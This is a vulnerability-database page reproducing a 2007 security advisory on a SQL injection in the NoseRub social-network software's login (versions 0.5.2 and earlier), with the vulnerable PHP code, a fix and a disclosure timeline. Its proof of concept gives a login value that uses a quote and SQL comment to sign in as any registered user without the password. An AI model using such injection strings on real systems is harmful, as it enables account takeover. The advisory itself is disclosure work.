Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NoseRub <= 0.5.2 Login SQL Injection Vulnerability

🗓️ 29 Dec 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 25 Views

NoseRub <= 0.5.2 Login SQL Injection Vulnerabilit

Code

                                                ############################################################################
&nbsp;&nbsp;&nbsp;&nbsp;--&nbsp;----------&nbsp;&nbsp;----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;----------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------&nbsp;----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--&nbsp;&nbsp;-----------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-------------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---seclog-&nbsp;------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;------------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--&nbsp;&nbsp;---&nbsp;&nbsp;&nbsp;-------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----&nbsp;&nbsp;&nbsp;&nbsp;-------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--------------&nbsp;&nbsp;&nbsp;-----------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--------------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--&nbsp;&nbsp;&nbsp;---&nbsp;&nbsp;-
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;---&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--------------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;--&nbsp;&nbsp;-
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;--
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-----&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--
############################################################################
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;seclog.de&nbsp;Security&nbsp;Advisory&nbsp;2007-001&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#
############################################################################


&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Advisory:&nbsp;NoseRub&nbsp;Login&nbsp;SQL&nbsp;Injection&nbsp;Vulnerability&nbsp;
&nbsp;&nbsp;&nbsp;Affected&nbsp;Versions:&nbsp;&lt;=&nbsp;0.5.2
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Fixed&nbsp;Versions:&nbsp;current&nbsp;SVN
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Risk:&nbsp;critical
&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Vendor&nbsp;URL:&nbsp;http://noserub.com
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Vendor&nbsp;Status:&nbsp;informed,&nbsp;fixed&nbsp;version&nbsp;will&nbsp;be&nbsp;released&nbsp;soon
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Advisory&nbsp;URL:&nbsp;http://seclog.de/pub/seclog-2007-001.txt
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Advisory&nbsp;Status:&nbsp;public
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Author:&nbsp;Felix&nbsp;Groebert&nbsp;&lt;felix&nbsp;AT&nbsp;groebert&nbsp;DOT&nbsp;org&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Revision:&nbsp;2007-12-26



Introduction
============
&nbsp;&nbsp;NoseRub&nbsp;is&nbsp;a&nbsp;protocol&nbsp;for&nbsp;and&nbsp;a&nbsp;sample&nbsp;implementation&nbsp;of&nbsp;a&nbsp;decentralized
&nbsp;&nbsp;social&nbsp;network.


Vulnerability
=============
&nbsp;&nbsp;The&nbsp;login&nbsp;script&nbsp;fails&nbsp;to&nbsp;validate&nbsp;user&nbsp;input.&nbsp;It&nbsp;is&nbsp;possible&nbsp;to&nbsp;insert
&nbsp;&nbsp;double&nbsp;quotes&nbsp;in&nbsp;order&nbsp;to&nbsp;escape&nbsp;the&nbsp;following&nbsp;SQL&nbsp;query:

&nbsp;&nbsp;SELECT&nbsp;`Identity`.`id`,&nbsp;`Identity`.`is_local`,&nbsp;[...]
&nbsp;&nbsp;FROM&nbsp;`identities`&nbsp;AS&nbsp;`Identity`&nbsp;WHERE&nbsp;`Identity`.`hash`&nbsp;=&nbsp;''
&nbsp;&nbsp;AND&nbsp;`Identity`.`username`&nbsp;=&nbsp;&quot;www.example.com/noserub/USERNAME&quot;
&nbsp;&nbsp;AND&nbsp;`Identity`.`password`&nbsp;=&nbsp;'f970e2767d0cfe75876ea857f92e319b'&nbsp;LIMIT&nbsp;1

&nbsp;&nbsp;The&nbsp;query&nbsp;is&nbsp;generated&nbsp;at&nbsp;the&nbsp;end&nbsp;of&nbsp;the&nbsp;function&nbsp;check()&nbsp;in
&nbsp;&nbsp;app/models/identity.php:

&nbsp;&nbsp;return&nbsp;$this-&gt;find(array('Identity.hash'&nbsp;=&gt;&nbsp;'',
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Identity.username&nbsp;=&nbsp;&quot;'.&nbsp;$username&nbsp;.'&quot;',&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Identity.password'&nbsp;=&gt;&nbsp;md5($data['Identity']['password'])));


Proof&nbsp;of&nbsp;Concept
================
&nbsp;&nbsp;The&nbsp;SQL&nbsp;injection&nbsp;bug&nbsp;can&nbsp;be&nbsp;exploited&nbsp;by&nbsp;impersonating&nbsp;a&nbsp;registered&nbsp;user.

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Go&nbsp;to:&nbsp;http://www.example.com/noserub/pages/login/
&nbsp;&nbsp;Login&nbsp;as:&nbsp;somereallogin&nbsp;&quot;&nbsp;--&nbsp;&quot;
&nbsp;&nbsp;Password:&nbsp;unknownpassword

&nbsp;&nbsp;This&nbsp;results&nbsp;in&nbsp;the&nbsp;following&nbsp;SQL&nbsp;query,&nbsp;commenting&nbsp;out&nbsp;the&nbsp;fourth&nbsp;and&nbsp;fifth
&nbsp;&nbsp;lines&nbsp;using&nbsp;double&nbsp;dashes,&nbsp;thus&nbsp;maintaining&nbsp;valid&nbsp;SQL&nbsp;syntax.

&nbsp;&nbsp;SELECT&nbsp;`Identity`.`id`,&nbsp;`Identity`.`is_local`,&nbsp;[...]
&nbsp;&nbsp;FROM&nbsp;`identities`&nbsp;AS&nbsp;`Identity`&nbsp;WHERE&nbsp;`Identity`.`hash`&nbsp;=&nbsp;''
&nbsp;&nbsp;AND&nbsp;`Identity`.`username`&nbsp;=&nbsp;&quot;www.example.com/noserub/somereallogin&quot;
&nbsp;&nbsp;--&nbsp;&quot;&quot;&nbsp;AND&nbsp;`Identity`.`password`&nbsp;=&nbsp;'f970e2767d0cfe75876ea857f92e319b'
&nbsp;&nbsp;LIMIT&nbsp;1


Recommendation
==============
&nbsp;&nbsp;It&nbsp;is&nbsp;recommended&nbsp;to&nbsp;upgrade&nbsp;to&nbsp;NoseRub&nbsp;&gt;&nbsp;0.5.2.
&nbsp;&nbsp;A&nbsp;preliminary&nbsp;patched&nbsp;version&nbsp;of&nbsp;the&nbsp;affected&nbsp;file&nbsp;can&nbsp;be&nbsp;downloaded&nbsp;from
&nbsp;&nbsp;SVN&nbsp;revision&nbsp;515:
&nbsp;&nbsp;http://noserub.googlecode.com/svn/trunk/app/models/identity.php


Disclosure&nbsp;Timeline
===================
&nbsp;&nbsp;2007-12-19&nbsp;Problem&nbsp;found
&nbsp;&nbsp;2007-12-19&nbsp;Notified&nbsp;developers
&nbsp;&nbsp;2007-12-20&nbsp;Received&nbsp;response&nbsp;with&nbsp;proposed&nbsp;fix
&nbsp;&nbsp;2007-12-20&nbsp;Sent&nbsp;acknowledgment&nbsp;concerning&nbsp;fix
&nbsp;&nbsp;2007-12-26&nbsp;Released&nbsp;advisory&nbsp;to&nbsp;public


About&nbsp;seclog.de
===============
&nbsp;&nbsp;seclog.de&nbsp;is&nbsp;not&nbsp;your&nbsp;average&nbsp;latest-vulnerability-weblog.&nbsp;We&nbsp;try&nbsp;to
&nbsp;&nbsp;deliver&nbsp;quality&nbsp;commentary&nbsp;on&nbsp;recent&nbsp;security&nbsp;news&nbsp;and&nbsp;issues.&nbsp;Our&nbsp;focus
&nbsp;&nbsp;ranges&nbsp;from&nbsp;secure&nbsp;programming,&nbsp;exploitation&nbsp;techniques,&nbsp;applied
&nbsp;&nbsp;cryptography,&nbsp;network&nbsp;security,&nbsp;privacy,&nbsp;biometrics&nbsp;to&nbsp;social&nbsp;engineering:
&nbsp;&nbsp;from&nbsp;the&nbsp;organizational&nbsp;and&nbsp;human&nbsp;layers&nbsp;to&nbsp;the&nbsp;physical&nbsp;and&nbsp;application
&nbsp;&nbsp;layers.&nbsp;The&nbsp;weblog&nbsp;is&nbsp;partly&nbsp;in&nbsp;english&nbsp;and&nbsp;german.&nbsp;Check&nbsp;it&nbsp;out.


Disclaimer&nbsp;and&nbsp;Copyright
========================
&nbsp;&nbsp;The&nbsp;author&nbsp;is&nbsp;not&nbsp;responsible&nbsp;for&nbsp;the&nbsp;misuse&nbsp;of&nbsp;the&nbsp;information&nbsp;provided&nbsp;in
&nbsp;&nbsp;this&nbsp;security&nbsp;advisory.&nbsp;Advisories&nbsp;are&nbsp;a&nbsp;service&nbsp;to&nbsp;the&nbsp;professional
&nbsp;&nbsp;security&nbsp;community.&nbsp;There&nbsp;are&nbsp;NO&nbsp;WARRANTIES&nbsp;with&nbsp;regard&nbsp;to&nbsp;this&nbsp;information.
&nbsp;&nbsp;Any&nbsp;application&nbsp;or&nbsp;distribution&nbsp;of&nbsp;this&nbsp;information&nbsp;constitutes&nbsp;acceptance
&nbsp;&nbsp;AS&nbsp;IS,&nbsp;at&nbsp;the&nbsp;user's&nbsp;own&nbsp;risk.&nbsp;This&nbsp;information&nbsp;is&nbsp;subject&nbsp;to&nbsp;change&nbsp;without
&nbsp;&nbsp;notice.

&nbsp;&nbsp;This&nbsp;advisory&nbsp;Copyright&nbsp;(C)&nbsp;2007&nbsp;Felix&nbsp;Groebert.&nbsp;Permission&nbsp;is&nbsp;hereby&nbsp;granted
&nbsp;&nbsp;to&nbsp;redistribute&nbsp;this&nbsp;advisory,&nbsp;providing&nbsp;that&nbsp;no&nbsp;changes&nbsp;are&nbsp;made&nbsp;and&nbsp;that
&nbsp;&nbsp;the&nbsp;copyright&nbsp;notices&nbsp;and&nbsp;disclaimers&nbsp;remain&nbsp;intact.

############################################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Dec 2007 00:00Current
7.1High risk
Vulners AI Score7.1
noserubloginsql injectionvulnerability
25